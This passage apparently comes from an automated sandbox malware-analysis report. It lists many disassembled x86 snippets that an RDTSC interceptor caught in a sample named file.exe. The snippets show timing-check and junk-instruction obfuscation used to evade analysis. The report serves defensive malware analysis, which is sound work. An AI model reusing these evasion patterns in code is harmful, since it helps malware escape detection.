0x00000070 and edi, 0708B497h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB029 second address: 8FB02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB02D second address: 8FB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB033 second address: 8FB03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FBF5F second address: 8FBF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503871h 0x00000009 popad 0x0000000a jmp 00007F848150386Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FBF8B second address: 8FBF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCF58 second address: 8FCF84 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F848150386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007F8481503877h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 906153 second address: 90615D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90615D second address: 906167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 906167 second address: 90616B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90616B second address: 906180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 906180 second address: 906184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89D401 second address: 89D409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90587C second address: 905880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905880 second address: 905886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905886 second address: 905896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F8480743926h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905896 second address: 90589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BBB second address: 905BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BBF second address: 905BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 jmp 00007F848150386Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F848150386Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BF0 second address: 905BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BF6 second address: 905C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503879h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905C18 second address: 905C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905C22 second address: 905C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905D40 second address: 905D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90B449 second address: 90B45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8481503866h 0x0000000a pop esi 0x0000000b jl 00007F848150386Ah 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90B45E second address: 90B484 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F848074392Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F8480743928h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F848074392Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90D702 second address: 90D714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8481503866h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90D714 second address: 90D71A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90D71A second address: 90D720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914012 second address: 914025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912C71 second address: 912C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912C7A second address: 912C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912C80 second address: 912C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913324 second address: 91332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91332A second address: 913345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F8481503873h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913345 second address: 913369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F8480743943h 0x0000000b jmp 00007F8480743937h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913369 second address: 913373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913373 second address: 913379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913379 second address: 91337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91337E second address: 913389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8480743926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9134D0 second address: 9134E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F8481503866h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9134E1 second address: 9134F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91368A second address: 91368E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91368E second address: 913692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9137E4 second address: 913805 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F8481503866h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 je 00007F8481503866h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913ABB second address: 913AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913AD2 second address: 913ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913C30 second address: 913C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE71 second address: 89EE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE76 second address: 89EE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D8E2 second address: 91D8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91C5FB second address: 91C601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91C8CD second address: 91C8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 jl 00007F8481503866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CA31 second address: 91CA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743935h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CA4C second address: 91CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CCC9 second address: 91CCCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91CCCD second address: 91CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D11D second address: 91D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F8480743926h 0x0000000d jno 00007F8480743926h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C9783 second address: 8C9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D773 second address: 91D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D777 second address: 91D792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F848150386Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D792 second address: 91D7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924375 second address: 92437F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92437F second address: 924389 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924389 second address: 924394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894CAB second address: 894CC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F848074392Ch 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92332B second address: 923341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92360B second address: 923626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743937h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923761 second address: 923765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A35 second address: 923A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A3B second address: 923A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503875h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A5A second address: 923A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8480743938h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8480743931h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923A8E second address: 923AA3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923AA3 second address: 923AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C10 second address: 923C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923C14 second address: 923C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743937h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DBB second address: 923DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F848150386Fh 0x00000008 jl 00007F8481503866h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DD7 second address: 923DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DDF second address: 923DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 923DE5 second address: 923DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278BE second address: 9278C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278C2 second address: 9278C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278C6 second address: 9278D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278D0 second address: 9278D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278D4 second address: 9278F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jo 00007F848150387Ah 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F8481503866h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF3E second address: 92AF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF47 second address: 92AF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF4D second address: 92AF62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jno 00007F8480743926h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF62 second address: 92AF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF66 second address: 92AF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92AF6C second address: 92AF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E276B second address: 8E279E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480743934h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2C1E second address: 8E2C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2C24 second address: 8E2C9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 jmp 00007F8480743935h 0x0000001a pop ebx 0x0000001b pop eax 0x0000001c mov cx, si 0x0000001f pushad 0x00000020 jmp 00007F848074392Eh 0x00000025 mov si, cx 0x00000028 popad 0x00000029 call 00007F8480743929h 0x0000002e jmp 00007F8480743938h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8480743934h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2C9E second address: 8E2CA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2CA3 second address: 8E2CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007F8480743933h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F8480743935h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2D75 second address: 8E2D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E30A8 second address: 8E30B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jnp 00007F8480743934h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E30B9 second address: 8E3102 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F848150386Ah 0x00000010 push 00000004h 0x00000012 jmp 00007F8481503876h 0x00000017 push eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8481503878h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3102 second address: 8E3106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3575 second address: 8E357A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E389B second address: 8E389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
